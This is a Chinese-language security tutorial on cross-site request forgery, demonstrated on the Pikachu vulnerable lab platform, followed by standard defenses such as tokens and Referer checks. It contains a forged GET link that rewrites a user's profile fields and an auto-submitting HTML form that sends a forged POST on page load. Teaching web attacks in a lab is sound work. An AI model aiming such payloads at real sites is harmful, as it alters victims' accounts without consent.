小场面

  1. 场景一:我点击了一个好友转发的qq空间消息,怎么莫名其妙自己也转发了???
  2. 场景二:我点击了一个不可描述的网页,然后自己的账号做了一些不可描述的操作???

CSRF简介

上面两个场面其实就是利用了 CSRF(Cross Site Request Forgery),即跨站请求伪造。攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。可以这么理解:攻击者盗用了你的身份,以你的名义进行某些不可描述的操作。

想象一下,它可以以你的名义发邮件、发消息、转账、修改密码、删除文章/留言/评论…….属实可恶!

CSRF 与 XSS 相比,虽然 CSRF 攻击不太流行,但却更加难以防范,所以被认为 CSRF 比 XSS 更具危险性,CSRF 在业内具有“苏醒的巨人”的称号。

CSRF原理

一般来说,用户完成以下两个操作,就有可能遭受CSRF攻击。

  1. 登录信任网站A,并在本地生成Cookie。
  2. 在不登出A的情况下,访问危险网站B。

CSRF测试

pikachu漏洞练习平台之CSRF

GET方式

​ ① 用户甲登录信任网站,查看个人信息。

image-20210323205127914

​ ② 攻击者构造恶意的链接,并将其发送给用户甲。

通过抓包可见,修改个人信息后提交的请求方法是GET。

image-20210323211923048

URL里面的四个参数都可以被修改,直接构造URL为:

1
http://192.168.101.66/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=x&phonenum=000000&add=Mars&email=123@123.com&submit=submit

​ ③ 攻击者通过社工等手段引诱用户甲点击这个链接。如果用户甲此时登录状态或cookie/session没有过期,则他的信息就被修改了。

image-20210323212754122

可以看到,个人信息内容按照恶意链接的设置被修改了,而用户甲仅点击了那个不明链接。

POST方式

​ ① 同样,用户乙登录了他信任的网站,一切正常。

image-20210323213429091

​ ② 攻击者构造恶意的链接,并将其发送给用户乙。

抓包可见这次的请求方式是POST,URL不再显示修改参数,所以无法再使用上述办法(即通过URL来伪造请求)进行修改。

image-20210323213939444

但可以自行创建一个恶意表单,让用户点击这个表单的URL,通过此表单向存在CSRF漏洞的页面去提交POST请求。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<!DOCTYPE html>
<html>
<head lang="en">
	<title>csrf_post</title>
	<script>
    window.onload = function() {
    document.getElementById("postsubmit").click();
  }
    </script>
</head>
<body>
       <form action="http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
       	 <input type="text" name="sex" value="1"><br>
       	 <input type="hidden" name="phonenum" value="hacker"><br>
       	 <input type="hidden" name="add" value="china"><br>
       	 <input type="hidden" name="email" value="hacker"><br>
       	 <input id="postsubmit" type="submit" name="submit" value="submit" />
       </form>
</body>
</html>

​ ③ 用户乙点击了这个恶意表单的链接后,其个人信息被修改。

image-20210323215151210

CSRF防御

​ ① 尽量使用POST

GET接口太容易被拿来做CSRF攻击,接口最好限制为POST使用,降低攻击风险。

当然POST并不是万无一失,攻击者只要构造一个form就可以,但需要在第三方页面做,这样就增加暴露的可能性。

​ ② 二次验证

在通常情况下,验证码能很好遏制CSRF攻击。当用户收到验证码提示后,可能会心存怀疑,就不会乖乖中招。但是出于用户体验考虑,网站不能给所有的操作都加上验证码。

​ ③ Referer Check

Referer Check在Web最常见的应用就是“防止图片盗链”。同理,Referer Check也可以被用于检查请求是否来自合法的“源”(Referer值是否是指定页面,或者网站的域),如果都不是,那么就极可能是CSRF攻击。

但是因为服务器并不是什么时候都能取到Referer,所以也无法作为CSRF防御的主要手段。

​ ④ Token认证

Token 即标志,记号的意思,也叫作令牌。

例子:

  1. 用户访问某个表单页面。
  2. 服务端生成一个Token,放在用户的Session中,或者浏览器的Cookie中。
  3. 在页面表单附带上Token参数。
  4. 用户提交请求后, 服务端验证表单中的Token是否与用户Session(或Cookies)中的Token一致,一致为合法请求,不是则非法请求。

这个Token的值必须是随机的,不可预测的。由于Token的存在,攻击者无法再构造一个带有合法Token的请求实施CSRF攻击。另外使用Token时应注意Token的保密性,尽量把敏感操作由GET改为POST,以form或AJAX形式提交,避免Token泄露。

CSRF的Token仅仅适用于对抗CSRF攻击。当网站同时存在XSS漏洞时候,那这个方案也是空谈。因为攻击者可以通过js获取Token值。

参考资料

[1] Pikachu之CSRF

[2] Web安全之CSRF攻击